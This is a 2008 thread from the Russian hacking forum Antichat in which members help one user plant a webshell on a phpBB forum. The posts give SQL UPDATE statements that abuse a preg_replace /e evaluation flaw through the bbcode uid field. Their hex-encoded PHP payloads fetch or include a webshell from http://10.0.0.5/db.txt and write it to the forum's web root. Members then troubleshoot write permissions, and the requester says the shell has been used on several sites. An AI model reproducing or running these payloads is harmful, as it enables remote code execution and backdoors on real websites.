ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 17.04.2008, 20:16
Аватар для number0
number0
Познающий
Регистрация: 01.03.2008
Сообщений: 39
Провел на форуме:
210936

Репутация: 24
По умолчанию

Scipio я так понял тут привязка пошла к 192.168.10.5 ? Походу да.. не вышло. Возможно из-за того что 192.168.10.5 в другой под сети...
Если не трудно. то пожалуйста зделай под IP 10.0.0.5
 
Ответить с цитированием

  #12  
Старый 17.04.2008, 20:20
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=0x70687062623A636F70792822687474703A2F2F31302E302E302E352F64622E747874222C222F7661722F7777772F68746D6C2F666F72756D2F64622E7068702229 WHERE user_id=2;
надеюсь на 10.0.0.5 поднят вебсервер?
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #13  
Старый 17.04.2008, 20:28
Аватар для number0
number0
Познающий
Регистрация: 01.03.2008
Сообщений: 39
Провел на форуме:
210936

Репутация: 24
По умолчанию

Конечно, стоит апач с подержкой пхп.
Сообствено написало что БД успешно востановлена... но при входе в "профиль" просто пустая белая страница.
И при заходе на /forum/db.php

Цитата:
The requested URL /forum/db.php was not found on this server.

Последний раз редактировалось number0; 17.04.2008 в 20:31..
 
Ответить с цитированием

  #14  
Старый 17.04.2008, 20:31
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

ну если все удачно прошло, то здесь /var/www/html/forum/ будет шелл с именем db.php
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #15  
Старый 17.04.2008, 20:32
Аватар для number0
number0
Познающий
Регистрация: 01.03.2008
Сообщений: 39
Провел на форуме:
210936

Репутация: 24
По умолчанию

Scipio читай выше.. (я пост просто отредактировал). Что-то видать не верно..
 
Ответить с цитированием

  #16  
Старый 17.04.2008, 20:34
Аватар для vp$
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию

прочитайте пост #3 три раза
одно дело ты записываешь функцию в базу, а другое записывать файл с помощью базы, если прав на работу с файлами нет, хоть об стенку бейся ни че не выйдет!
 
Ответить с цитированием

  #17  
Старый 17.04.2008, 20:45
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от vp$  
прочитайте пост #3 три раза
одно дело ты записываешь функцию в базу, а другое записывать файл с помощью базы, если прав на работу с файлами нет, хоть об стенку бейся ни че не выйдет!
да причем здесь это, заливка происходит средствами php а не mysql

2number0, возможно нет прав на запись в эту папку, ищи папку где точно есть права на запись, например можно попробовать папку с аватарами, попробуй так:
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig=0x70687062623A696E636C7564652022687474703A2F2F31302E302E302E352F64622E74787422 WHERE user_id=2;
это инклюд
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #18  
Старый 17.04.2008, 20:53
Аватар для number0
number0
Познающий
Регистрация: 01.03.2008
Сообщений: 39
Провел на форуме:
210936

Репутация: 24
По умолчанию

Успешно БД востановило... профиль по прежнему пустой. Собственно что должно было выполнится?
 
Ответить с цитированием

  #19  
Старый 17.04.2008, 20:59
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

должен был шелл http://10.0.0.5/db.txt проинклюдиться, db.txt- это точно полноценный вебшел?
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #20  
Старый 17.04.2008, 21:07
Аватар для number0
number0
Познающий
Регистрация: 01.03.2008
Сообщений: 39
Провел на форуме:
210936

Репутация: 24
По умолчанию

Да полностью роботает, использовал его не на одном сайте.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
webshell scripts -) blackybr PHP, PERL, MySQL, JavaScript 20 28.03.2010 02:17
заливка шела через Koobi CMS vp$ Сценарии/CMF/СMS 2 14.06.2008 08:43
Unix shell: работа, программы SSH PandoraBox Soft - *nix 3 08.04.2008 23:58
бэкап бд в phpBB2 Plus IGEMON Форумы 6 09.02.2008 01:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ